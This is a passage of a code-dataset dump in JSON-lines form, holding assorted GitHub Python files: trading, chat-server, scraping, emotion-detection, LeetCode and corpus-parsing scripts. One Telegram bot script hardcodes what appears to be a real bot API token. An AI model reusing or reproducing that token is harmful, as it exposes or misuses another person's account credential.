strike_list.append(strike + 50)\n\n print(\"[Info] STRIKE LIST: \", strike_list)\n\n # NSE:NIFTY2390719400CE\n\n if strike_list:\n mapper = {'NSE:NIFTY50-INDEX': \"NSE:NIFTY\", \"NSE:NIFTYBANK-INDEX\": 'NSE:BANKNIFTY'}\n for strike in strike_list:\n ltp_option = mapper[symbol] + expiry_str + str(strike)\n instrument_list.append(ltp_option + \"CE\")\n instrument_list.append(ltp_option + \"PE\")\n\n return instrument_list\n\n else:\n raise ValueError(\"[Error] Can't determine instrument list. 
Please check correct expiry.\")\n\n\ndef run_server(access_token: str, conf: object):\n app_id = getattr(conf, 'app_id', '')\n access_token = access_token\n fyers = fyersModel.FyersModel(token=access_token, is_async=False, client_id=app_id, log_path=\"./logs\")\n\n # Add Indexes 'NSE:NIFTYBANK-INDEX', 'NSE:NIFTY50-INDEX',\n index_list = ['NSE:NIFTY50-INDEX', 'NSE:NIFTYBANK-INDEX']\n instrument_list = []\n\n for index in index_list:\n expiry = conf.get_weekly_expiry(index)\n print(f\"[Info] Expiry for {index} :\", expiry)\n\n temp_inst_list = get_opt_instruments_list(fyers, index, expiry)\n instrument_list.extend(temp_inst_list)\n\n instrument_list.extend(getattr(conf, 'instruments', None))\n instrument_list.extend(index_list)\n\n print(\"[Info] BELOW IS THE COMPLETE INSTRUMENT LIST\", instrument_list)\n\n # END INPUT DATA\n t1 = threading.Thread(target=start_server)\n t1.start()\n\n access_token_websocket = app_id + '-100' + \":\" + access_token\n fs = ws.FyersSocket(access_token=access_token_websocket, run_background=False, log_path=\"./logs\")\n fs.websocket_data = on_ticks\n\n fs.subscribe(symbol=instrument_list, data_type=\"symbolData\")\n fs.keep_running()\n\n t1.join()\n print(\"websocket started !!\")\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"sanju918/fyers_algo","sub_path":"src/fyers_server.py","file_name":"fyers_server.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"789537846","text":"\r\nfrom DatabaseMgr.DatabaseMgr import *\r\n\r\nimport matplotlib.pyplot as plt\r\nimport argparse\r\n\r\nclass FeatureStatExtractor(DatabaseManager):\r\n\r\n def get_data(self, database_file, quantity):\r\n self.connect_db(database_file)\r\n \r\n # Get data\r\n statement = ('''select id, info, count(*) as freq from %s INNER JOIN %s ON %s = id group by %s ORDER BY count(*) DESC LIMIT :quantity''' \r\n % (self.get_relation_name(), self.get_table_name(), self.get_column_name(), self.get_column_name()))\r\n rows = self.search_db(statement, {'quantity':quantity})\r\n\r\n self.disconnect_db()\r\n\r\n return rows\r\n \r\n def get_relation_name(self):\r\n return self.relation_name\r\n\r\n def get_table_name(self):\r\n return self.table_name\r\n \r\n def get_column_name(self):\r\n return self.column_name\r\n\r\nclass PermissionStatExtractor(FeatureStatExtractor):\r\n\r\n relation_name = \"apk_permissions\"\r\n table_name = \"permissions\"\r\n column_name = \"permission\"\r\n\r\nclass FunctionalityStatExtractor(FeatureStatExtractor):\r\n\r\n relation_name = \"apk_functionalities\"\r\n table_name = \"functionalities\"\r\n column_name = \"functionality\"\r\n\r\ndef main():\r\n\r\n # Config argument parser\r\n argparser = argparse.ArgumentParser(description='Koodous dataset downloader')\r\n argparser.add_argument('--database-file', '-dbf', help = 'SQL3 database file location', required=True)\r\n argparser.add_argument('--quantity', '-q', help = 'Amount of values to show in the histogram', default = 10, type=int)\r\n argparser.add_argument('--feature-key', '-fk', help = 'Feature from which extract stats', required=True)\r\n \r\n # Parser arguments\r\n args = argparser.parse_args()\r\n database_file = args.database_file\r\n quantity = args.quantity\r\n feature_key = args.feature_key\r\n\r\n fse = None\r\n if feature_key == \"p\":\r\n fse = PermissionStatExtractor()\r\n elif feature_key == \"f\":\r\n fse = FunctionalityStatExtractor()\r\n else:\r\n argparser.error(\"Incorrect feature-key 
identifier\")\r\n \r\n rows = fse.get_data(database_file, quantity)\r\n\r\n x = [row['info'].split('.')[-1] for row in rows]\r\n y = [row['freq'] for row in rows] \r\n \r\n plt.hist(x, weights=y, bins=len(x))\r\n plt.show()\r\n \r\n \r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"MartGon/MalwareClassifier","sub_path":"src/DatasetStatistics.py","file_name":"DatasetStatistics.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13397710476","text":"'''\n이취코테 p315 실전문제: 볼링공 고르기\n2019 SW 마에스트로 입학 테스트\n'''\nimport time\nimport itertools\n\nM, N = map(int, input().split())\nweights = list(map(int, input().split()))\n\nstart_time = time.time() #측정 시작\n\nweights.sort()\nprint(weights)\n\nresult = list(itertools.combinations(weights, 2))\n\nfor item in result:\n if item[0] == item[1]:\n result.remove(item)\n\nprint(len(result))\n\nprint(\"time :\", time.time() - start_time)","repo_name":"kss02281/Algorithm_Study","sub_path":"2022_Solved/2주차_Greedy/ch11_볼링공 고르기.py","file_name":"ch11_볼링공 고르기.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28754411961","text":"\"\"\"\nLos Diccionarios se basan en una llave y elementos.\nLa llave puede ser un string, un int, y los elementos pueden ser string, int, tuplas, listas u otros diccionarios\n\"\"\"\nages = {\n \"Dave\": 24,\n \"Mary\": 42,\n \"John\": 58\n}\nprint(ages[\"Mary\"])\n\ndatos = {\n 1:{\n 'name' : \"Dave\",\n 'age' : 24\n },\n 2: 'test',\n 3: [\"uno\",\"dos\",\"tres\"]\n}\nprint(datos[1]['age'])\nprint(datos[2])\nprint(datos[3][1])\n\n","repo_name":"sugofc/Sololearn","sub_path":"Python/dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8828909504","text":"import json\n\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\n\nfrom api.libs.utils.socket_communication import get_socket_group_name, fetch_workflow_comments, get_workflow_group_name\n\n\nclass WorkflowCommentConsumer(WebsocketConsumer):\n def connect(self):\n user = self.scope[\"user\"]\n workflow_id = self.scope.get(\"url_route\", {}).get(\"kwargs\", {}).get(\"workflow_id\")\n if user.is_anonymous:\n self.close()\n return\n\n group_name = get_workflow_group_name(workflow_id)\n\n async_to_sync(self.channel_layer.group_add)(\n group_name,\n self.channel_name\n )\n\n self.accept()\n\n workflow_comments = fetch_workflow_comments(workflow_id)\n return self.send(text_data=json.dumps(workflow_comments))\n\n def disconnect(self, close_code):\n self.close()\n\n def notify(self, payload):\n data = payload['data']\n return self.send(text_data=json.dumps(data))\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/workflows/consumers/comment_consumer.py","file_name":"comment_consumer.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3923707907","text":"class Solution():\n def compress(self, chars):\n size = len(chars)\n if size < 2:\n return size\n anchor, write = 0, 0\n for pos, char in enumerate(chars):\n if (pos + 1) == size or char != chars[pos+1]:\n chars[write] = char\n write += 1\n if pos > anchor:\n repeated_times = pos - anchor + 1\n for num in 
str(repeated_times):\n chars[write] = num\n write += 1\n anchor = pos + 1\n return write\n","repo_name":"Beki4Git/Competitive-programming","sub_path":"string_compression.py","file_name":"string_compression.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21539267099","text":"from socket import AF_INET, SOCK_STREAM, socket\nimport select\nimport datetime\nfrom collections import defaultdict\nimport traceback\nimport responses as rsp\n\nfile_dict = {} # contains files and their contents\n\nuser_dict = defaultdict(set) # contains users and their files\nonline_clients = {} #clients -> sockets\nopen_files = defaultdict(list) # filename: [user_sock1, ..]\n\n\nSOCKET_LIST = []\n\n\ndef get_message(sock):\n message = ''\n chunk = sock.recv(rsp.BUFFER_SIZE)\n message += chunk\n while len(chunk) > 0 and not chunk.endswith(rsp.SPACE_INVADER):\n chunk = sock.recv(rsp.BUFFER_SIZE)\n print('recvd CHUNK', chunk)\n message += chunk\n return message\n\n\ndef broadcast_file_list(server_socket, sock):\n print('Broadcasting')\n for client, socket in online_clients.items():\n print(client)\n # send the message only to peer\n if socket != server_socket and socket != sock:\n try:\n print('socket send, data>', [rsp._FILE_LIST, list(user_dict[client])])\n socket.send(rsp.make_response([rsp._FILE_LIST] + list(user_dict[client])))\n except:\n # broken socket connection\n socket.close()\n # broken socket, remove it\n remove_user_presence(sock)\n\n\ndef broadcast_text(server_socket, sock, filename):\n print('Broadcasting')\n print(filename)\n print(open_files[filename])\n for socket in open_files[filename]:\n print(open_files)\n # send the message only to peer\n if socket != server_socket and socket != sock:\n try:\n print('socket send, data>', [rsp._UPDATE_FILE, file_dict[filename]])\n socket.send(rsp.make_response([rsp._UPDATE_FILE, file_dict[filename]]))\n except:\n print('socket send error broadacst text')\n # broken socket connection\n traceback.print_exc() \n\n # broken socket, remove it\n remove_user_presence(sock)\n\n\ndef edit_file(args):\n \"\"\"\n Changes contents of the file\n args:\n -file name\n -file content\n \"\"\"\n file_dict[args[0]] = args[1]\n return rsp.make_response([rsp._RESP_OK])\n\n\ndef create_file(user_name):\n if file_dict.keys():\n max_nr = max(map(int, file_dict.keys())) + 1\n else:\n max_nr = 0\n file_dict[str(max_nr)] = ''\n user_dict[user_name].add(str(max_nr))\n print('File created, ', str(max_nr))\n return rsp.make_response([rsp._FILE_NAME, str(max_nr)])\n\n\ndef open_file(filename, sock):\n print('open_file, sock', sock, 'filename', filename)\n for file in open_files:\n print(file)\n if file != filename:\n try:\n print('open_files[file].remove(sock), sock:', sock)\n open_files[file].remove(sock)\n except Exception as e:\n pass\n\n open_files[filename] += [sock]\n print('open_files', open_files)\n return rsp.make_response([rsp._FILE_CONTENT, file_dict[filename]])\n\n\ndef get_perm(filename):\n user_list = []\n for u_name in user_dict.keys():\n if filename in user_dict[u_name]:\n user_list.append(u_name)\n print('User list', user_list)\n return rsp.make_response([rsp._PERM_LIST] + user_list)\n \n\ndef edit_permission(args):\n \"\"\"\n args - list of names.\n 1. filename\n 2-inf. 
usernames\n \"\"\"\n filename = args[0]\n userlist = args[1:]\n if rsp.SPACE_INVADER in userlist:\n userlist.remove(rsp.SPACE_INVADER)\n print ('Editing permissions for file', filename)\n print ('New user list', userlist)\n for u_name in user_dict.keys():\n if u_name in userlist:\n user_dict[u_name].add(filename)\n else:\n try:\n user_dict[u_name].remove(filename)\n except KeyError:\n continue\n # Also add permissions to users not yet seen by the server\n for u_name in userlist:\n if u_name not in user_dict:\n user_dict[u_name].add(filename)\n print (user_dict)\n\n\ndef remove_user_presence(sock):\n # Remove client from online clients\n for client, socket in online_clients.items():\n if socket == sock:\n del online_clients[client]\n # Remove client from list of users having a file open\n for filename, socket_list in open_files.items():\n if socket in socket_list:\n socket_list.remove(socket)\n # Remove client from SOCKET_LIST\n try:\n SOCKET_LIST.remove(sock)\n except ValueError:\n pass\n\n socket.close()\n\n\nimport time\nif __name__ == '__main__':\n print ('Running')\n s = socket(AF_INET, SOCK_STREAM)\n SOCKET_LIST.append(s)\n s.bind(('127.0.0.1', 7777))\n s.listen(1)\n print (\"Socket is bound to %s:%d\" % s.getsockname())\n print ('Socket %s:%d is in listening state' % s.getsockname())\n threads = []\n try:\n while 1:\n ready_to_read, ready_to_write, in_error = select.select(SOCKET_LIST,[],[],0)\n\n for sock in ready_to_read:\n # print('sock', sock)\n # a new connection request recieved\n if sock == s:\n # Login choice\n sockfd, addr = s.accept()\n print ('Tulen!')\n message = sockfd.recv(rsp.BUFFER_SIZE) # We assume username is shorter than buffer\n message = rsp.sanitize_message(message)\n req_code = message[0]\n u_name = message[1]\n\n if u_name in online_clients:\n message = rsp.make_response([rsp._USERNAME_TAKEN])\n sockfd.send(message)\n break\n\n SOCKET_LIST.append(sockfd)\n online_clients[u_name] = sockfd\n print(online_clients)\n print (\"Client (%s, %s) connected\" % addr)\n print(user_dict)\n message = rsp.make_response([rsp._FILE_LIST] + list(user_dict[u_name]))\n sockfd.send(message)\n\n else:\n # message = get_message(sock)\n #Is message coming from that socket\n message = sock.recv(rsp.BUFFER_SIZE)\n final_message = message\n if message:\n #is message ended\n while len(message) == rsp.BUFFER_SIZE and not message.endswith(rsp.SPACE_INVADER):\n message = sock.recv(rsp.BUFFER_SIZE)\n final_message += message\n \n message = final_message\n print('SERVER RECEIVENG MSG:', message)\n message = rsp.sanitize_message(message)\n req_code = message[0]\n message = message[1:]\n\n\n if req_code == rsp._CREATE_FILE:\n u_name = [user for user, socket in online_clients.items() if socket == sock]\n response = create_file(u_name[0])\n elif req_code == rsp._OPEN_FILE:\n response = open_file(message[0], sock)\n elif req_code == rsp._UPDATE_FILE:\n file_dict[message[0]] = message[1]\n broadcast_text(s, sock, message[0])\n response = rsp.make_response([rsp._RESP_OK])\n elif req_code == rsp._GET_PERM:\n response = get_perm(message[0])\n elif req_code == rsp._SET_PERM:\n edit_permission(message)\n broadcast_file_list(s, sock)\n client = [client for client, socket in online_clients.items() if socket == sock][0]\n print('NEW LIST FOR CLIENT:', client, user_dict[client])\n response = rsp.make_response([rsp._FILE_LIST] + list(user_dict[client]))\n\n #TODO brodcast new file list\n else:\n continue\n print(file_dict)\n\n sock.send(response)\n else:\n remove_user_presence(sock)\n print('User 
disconnected. Presence removed.')\n time.sleep(0.01)\n\n except Exception as e:\n\n print ('Terminating ...')\n print(e)\n traceback.print_exc()\n s.close()\n\n","repo_name":"AnnabellKuldmaa/ds16","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35113273411","text":"import os\nimport re\nimport sys\nfrom collections import defaultdict\nfrom os import walk\nfrom pprint import pprint\nfrom subprocess import call, Popen, PIPE\n\nfrom typing import List, Dict, Optional\n\nfrom cppcheckdata import parsedump, Token\n\nCPP_CHECK = '/home/znarf/Téléchargements/cppcheck-1.82/cppcheck'\n\n\ndef main():\n print(sys.argv)\n\n function_calls = defaultdict(set)\n files_deps = defaultdict(set)\n func_decl_file = {} # type: Dict[str, str]\n\n for dirpath, _, files in walk('.'):\n for basename in files:\n file = os.path.join(dirpath, basename)\n\n if file[-2:] == '.c':\n print(file)\n call([CPP_CHECK, '--dump', file] + sys.argv[1:])\n\n dump_file = file + '.dump'\n d = parsedump(dump_file)\n os.remove(dump_file)\n\n try:\n # functions = d.configurations[0].functions\n scopes = d.configurations[0].scopes\n tokens = d.configurations[0].tokenlist # type: List[Token]\n\n for scope in scopes:\n scope.tokens = [t for t in tokens if t.scopeId == scope.Id]\n\n for scope in scopes:\n if scope.type == 'Function':\n func_decl_file[scope.function.name] = file\n for t in scope.tokens:\n if t.function is not None:\n function_calls[scope.function.name].add(t.function.name)\n\n except Exception as e:\n print(e)\n\n # Dépendences entre fichiers .c\n for caller, callees in function_calls.items():\n for callee in callees:\n if caller in func_decl_file and callee in func_decl_file:\n files_deps[func_decl_file[caller]].add(func_decl_file[callee])\n\n pprint(function_calls, indent=2)\n pprint(func_decl_file, indent=2)\n pprint(files_deps, indent=2)\n\n dot_graph('calls', function_calls)\n dot_graph('files', files_deps)\n dot_graph('full', function_calls, reverse_dict(func_decl_file))\n\n\ndef reverse_dict(d):\n out = defaultdict(set)\n\n for k, v in d.items():\n out[v].add(k)\n\n return dict(out)\n\n\ndef dot_graph(name: str,\n d: Dict[str, str],\n clusters: Optional[Dict[str, str]] = None) -> None:\n dot = '''digraph d {\n rankdir = UD;\n node [shape = rectangle; style = rounded];\n '''\n\n if clusters is not None:\n r = re.compile('[~\\W]')\n for cluster, nodes in clusters.items():\n dot += 'subgraph cluster_{} {{\\n'.format(r.sub('_', cluster))\n dot += 'label = \"{}\"\\n'.format(cluster)\n for node in sorted(nodes):\n dot += '\"{}\";\\n'.format(node)\n dot += '}\\n\\n'\n\n for caller, callees in d.items():\n dot += '\"{}\" -> {{\"{}\"}};\\n'.format(caller, '\" \"'.join(sorted(callees)))\n\n dot += '}'\n\n print('==================================================')\n print(dot)\n print('==================================================')\n\n outfile = name + '.png'\n p = Popen(['dot', '-Tpng', '-o', outfile], stdin=PIPE, stdout=PIPE)\n p.communicate(bytes(dot, 'utf8'))\n\n call(['xdg-open', outfile])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"znarf94/c_call_graph","sub_path":"cppcheck_graph.py","file_name":"cppcheck_graph.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10872026438","text":"import json\r\nimport requests\r\nfrom kafka import 
KafkaConsumer\r\n\r\nconsumer = KafkaConsumer('test', bootstrap_servers=['localhost:9092'],\r\n value_deserializer=lambda m: json.loads(m.decode('ascii')))\r\nfor message in consumer:\r\n value = message.value\r\n print(\"Recieved parameters:\")\r\n print(value)\r\n headers = {\r\n 'Content-Type':'application/json; charset=UTF-8',\r\n }\r\n info = requests.post(\"http://127.0.0.1:5000/predict\",data=json.dumps(message.value['body']),headers=headers)\r\n print(\"The prediction is:\")\r\n print(info.text)\r\n\r\n","repo_name":"suddenukit/Iris-Model-Flask-App","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19115364546","text":"# Написать приложение, которое собирает основные новости с сайта на выбор news.mail.ru, lenta.ru, yandex-новости.\n# Для парсинга использовать XPath. Структура данных должна содержать:\n# название источника;\n# наименование новости;\n# ссылку на новость;\n# дата публикации.\n# Сложить собранные новости в БД\n\nfrom pprint import pprint\nfrom lxml import html\nimport requests\nfrom pymongo import MongoClient\n\nclient = MongoClient('127.0.0.1', 27017)\ndb = client['News']\nnews_item = db.mail_news\n\nurl = 'https://news.mail.ru/'\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'}\n\nresponse = requests.get(url, headers=headers)\ndom = html.fromstring(response.text)\nitems = dom.xpath('//td[@class=\"daynews__main\"]/div | //div[@class=\"daynews__item\"] | //ul[@data-module]/li')\nfor item in items:\n news = {}\n title = item.xpath('.//span[@class=\"photo__captions\"]//span[1]/text() | .//a/text()')[0].replace('\\xa0', ' ')\n link = item.xpath('.//a/@href')[0]\n response_link = requests.get(link, headers=headers)\n dom_news = html.fromstring(response_link.text)\n source = dom_news.xpath('//span[@class=\"note\"]//span[@class=\"link__text\"]/text()')[0]\n date = dom_news.xpath('//span[@class=\"note\"]/span[@datetime]/@datetime')[0]\n\n news['title'] = title\n news['link'] = link\n news['date'] = date\n news['source'] = source\n\n try:\n news_item.update_one({'link': news['link']}, {'$set': news}, upsert=True)\n except Exception as ex:\n pprint(f'Cannot add this new in db {ex}')\n","repo_name":"Sorulai/ParsingPython","sub_path":"lesson4/mailnews.py","file_name":"mailnews.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17491683240","text":"import cv2\r\nfrom keras.models import model_from_json \r\nfrom keras.preprocessing import image \r\nimport numpy as np \r\n\r\n# Load the cascade\r\n#load model \r\nmodel = model_from_json(open(\"fer.json\", \"r\").read()) \r\n#load weights \r\nmodel.load_weights('fer.h5') \r\n\r\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\n# To capture video from webcam. 
\r\ncap = cv2.VideoCapture(0)\r\n# To use a video file as input \r\n# cap = cv2.VideoCapture('filename.mp4')\r\n\r\nwhile True:\r\n # Read the frame\r\n _, img = cap.read()\r\n # Convert to grayscale\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n # Detect the faces\r\n faces = face_cascade.detectMultiScale(gray, 1.5, 3)\r\n # Draw the rectangle around each face\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\r\n roi_gray=gray[y:y+w,x:x+h]#cropping region of interest i.e. face area from image \r\n roi_gray=cv2.resize(roi_gray,(48,48)) \r\n img_pixels = image.img_to_array(roi_gray) \r\n img_pixels = np.expand_dims(img_pixels, axis = 0) \r\n img_pixels /= 255 \r\n \r\n predictions = model.predict(img_pixels) \r\n \r\n #find max indexed array \r\n max_index = np.argmax(predictions[0]) \r\n \r\n emotions = ('angry', 'disgust', 'fear', 'happy', 'sad', 'surprise','neutral') \r\n predicted_emotion = emotions[max_index] \r\n \r\n cv2.putText(img, predicted_emotion, (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2) \r\n \r\n resized_img = cv2.resize(img, (1000, 700)) \r\n cv2.imshow('Facial emotion analysis ',resized_img) \r\n # Display\r\n \r\n # Stop if escape key is pressed\r\n k = cv2.waitKey(30) & 0xff\r\n if k==27:\r\n break\r\n# Release the VideoCapture object\r\ncap.release()","repo_name":"Sharon18wh1a0580/EmotionDetection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898300057","text":"# https://leetcode.com/problems/number-of-islands/\n\nimport collections\n\n# first thought, dfs, TC:O(N*M), SC:O(N*M)\ndef numIslands(grid) -> int:\n res = 0\n visit = set()\n\n def dfs(r, c):\n if r < 0 or c < 0 or r >= len(grid) or c >= len(grid[0]):\n return\n if (r, c) in visit:\n return\n if grid[r][c] == \"0\":\n return\n visit.add((r, c))\n for x, y in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n dfs(r + y, c + x)\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\" and (i, j) not in visit:\n res += 1\n dfs(i, j)\n return res\n\n\n# dfs, mark visit as \"0\" to save visit, TC:O(N*M), SC:O(N*M), worst case for all lands\ndef numIslands(grid) -> int:\n res = 0\n def dfs(r, c):\n if r < 0 or c < 0 or r >= len(grid) or c >= len(grid[0]) or grid[r][c] == \"0\":\n return\n grid[r][c] = \"0\"\n for x, y in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n dfs(r + y, c + x)\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\":\n res += 1\n dfs(i, j)\n return res\n\n# bfs, mark visit as \"0\" to save visit, TC:O(N*M), SC:O(N*M), worst case for all lands\ndef numIslands(grid) -> int:\n n = len(grid)\n m = len(grid[0])\n res = 0\n for i in range(n):\n for j in range(m):\n if grid[i][j] == '0':\n continue\n # do bfs for every 1s cell\n res += 1\n queue = collections.deque([(i, j)])\n grid[i][j] = '0' # mark visited\n while queue:\n r, c = queue.popleft()\n for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)): # four directions\n nr = r + dr\n nc = c + dc\n if nr < 0 or nc < 0 or nr >= n or nc >= m or grid[nr][nc] == '0':\n continue\n queue.append((nr, nc))\n grid[nr][nc] = '0' # marked visited\n return res\n","repo_name":"ychanc2104/LeetCode","sub_path":"Number of Islands.py","file_name":"Number of Islands.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} 
+{"seq_id":"74492152487","text":"# Exercício - sistema de perguntas e respostas\n\nperguntas = [\n {\n 'Pergunta': 'Quanto é 2+2?',\n 'Opções': {'a': '1','b': '3','c': '4','d': '5'},\n 'Resposta': '4'\n },\n {\n 'Pergunta': 'Quanto é 5*5?',\n 'Opções': {'a': '25','b': '55','c': '10','d': '51'},\n 'Resposta': '25'\n },\n {\n 'Pergunta': 'Quanto é 10/2?',\n 'Opções': {'a': '4','b': '5','c': '2','d': '1'},\n 'Resposta': '5'\n }\n]\nacertos = 0\nprint('{:-^20}'.format('SHOW DO MILHÃO'))\n\nfor pergunta in perguntas:\n print(f'Pergunta: {pergunta.get(\"Pergunta\")}\\n')\n\n print('Opções')\n for letra, resposta in pergunta.get('Opções').items():\n print(f'{letra}) {resposta: <2}')\n print()\n\n alternativa = input('Digite a alternativa correta: ')\n if pergunta.get('Opções').get(alternativa) == pergunta.get('Resposta'):\n print('Você acertou!')\n acertos += 1\n else:\n print('Você errou!')\n\n print()\n\nprint(f'Você acertou {acertos}\\nde {len(perguntas)} perguntas.')\n","repo_name":"LinekerCalseverini/PythonStudies","sub_path":"Aula77/aula77.py","file_name":"aula77.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71713643367","text":"from telegram.ext import *\nimport responses as r\n\ndef start_command(update, context):\n update.message.reply_text('salam bar shoma')\n\ndef main():\n updater = Updater('5263621778:AAEMxIktCgfExbYGmmltFHgZ-FjspX5PBcY', use_context=True)\n dp = updater.dispatcher\n\n dp.add_handler(CommandHandler(\"start\", start_command))\n updater.start_polling()\n updater.idle()\n\nmain()","repo_name":"imanhavangi/CancerContent","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27308760332","text":"from genericpath import exists\nimport os, sys\nfrom os.path import join\nimport tempfile\nimport shutil\nimport json\ntry:\n curr_path = os.path.dirname(os.path.abspath(__file__))\n teedoc_project_path = os.path.abspath(os.path.join(curr_path, \"..\", \"..\", \"..\"))\n if os.path.basename(teedoc_project_path) == \"teedoc\":\n sys.path.insert(0, teedoc_project_path)\nexcept Exception:\n pass\nfrom teedoc import Plugin_Base\nfrom teedoc import Fake_Logger\n\n__version__ = \"1.0.4\"\n\nclass Plugin(Plugin_Base):\n name = \"teedoc-plugin-baidu-tongji\"\n desc = \"baidu tongji support for teedoc\"\n defautl_config = {\n }\n\n def on_init(self, config, doc_src_path, site_config, logger = None, multiprocess = True, **kw_args):\n '''\n @config a dict object\n @logger teedoc.logger.Logger object\n '''\n self.logger = Fake_Logger() if not logger else logger\n self.doc_src_path = doc_src_path\n self.site_config = site_config\n self.config = Plugin.defautl_config\n self.config.update(config)\n self.logger.i(\"-- plugin <{}> init\".format(self.name))\n self.logger.i(\"-- plugin <{}> config: {}\".format(self.name, self.config))\n \n # set site_root_url env value\n if not \"code\" in config:\n self.logger.e('can not find config[\"code\"] in plugin {}'.format(self.name))\n return\n baidu_tongji_code = ''''''.format(config[\"code\"])\n self.html_header_items = [baidu_tongji_code]\n\n\n def on_add_html_header_items(self, type_name):\n return self.html_header_items\n\n\n\nif __name__ == \"__main__\":\n config = {\n }\n plug = 
Plugin(config=config)\n\n","repo_name":"teedoc/teedoc","sub_path":"plugins/teedoc-plugin-baidu-tongji/teedoc_plugin_baidu_tongji/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"53"} +{"seq_id":"6198675984","text":"from enum import Enum\nimport re\n\nfrom . import PubTatorDocument\nfrom . import PubTatorEntity\n\n\nclass PubTatorCorpusReader:\n class LineType(Enum):\n TITLE = 'TITLE'\n ABSTRACT = 'ABSTRACT'\n MENTION = 'MENTION'\n DOC_SEP = 'DOCUMENT SEPARATOR'\n\n def __init__(self, file_path):\n self.file_path = file_path\n self.__document_being_read = None\n self.corpus = []\n\n self.valid_transitions = {\n None: [self.LineType.DOC_SEP, self.LineType.TITLE],\n # Title must be followed by abstract\n self.LineType.TITLE: [self.LineType.ABSTRACT],\n # abstract can be followed by mentions or the next title\n # (if no mentions exist)\n self.LineType.ABSTRACT:\n [self.LineType.MENTION, self.LineType.DOC_SEP],\n # mention must be followed by another mention or document separator\n self.LineType.MENTION:\n [self.LineType.MENTION, self.LineType.DOC_SEP],\n # document separator must be followed by another title\n # or document separator\n self.LineType.DOC_SEP:\n [self.LineType.TITLE, self.LineType.DOC_SEP]\n }\n\n def load_corpus(self):\n with open(self.file_path, 'r') as file:\n lines = file.readlines()\n return self.__parse_lines(lines)\n\n def __parse_lines(self, content_lines):\n prev_line_type = None\n for line_number, line in enumerate(content_lines):\n try:\n curr_line_type = self.__get_line_type(line, line_number)\n self.__validate_line_type_transition(prev_line_type,\n curr_line_type)\n if (curr_line_type == self.LineType.ABSTRACT\n or curr_line_type == self.LineType.TITLE):\n line_info = re.split('[|]', line, maxsplit=2)\n else:\n line_info = re.split('[\\t]', line, maxsplit=5)\n\n if curr_line_type == self.LineType.DOC_SEP:\n self.corpus.append(self.__document_being_read)\n self.__document_being_read = None\n\n elif curr_line_type == self.LineType.TITLE:\n if self.__document_being_read is not None:\n self.corpus.append(self.__document_being_read)\n self.__document_being_read = PubTatorDocument(\n int(line_info[0]))\n self.__document_being_read.title_text = (\n line_info[2].rstrip('\\n'))\n\n elif curr_line_type == self.LineType.ABSTRACT:\n self.__document_being_read.abstract_text = (\n line_info[2].rstrip('\\n'))\n\n elif curr_line_type == self.LineType.MENTION:\n self.__document_being_read.add_entity(\n PubTatorEntity(int(line_info[0]), int(line_info[1]),\n int(line_info[2]), line_info[3],\n line_info[4],\n line_info[5].rstrip('\\n')))\n prev_line_type = curr_line_type\n except Exception as e:\n raise Exception('ERROR occured when parsing line'\n f' #{line_number}. 
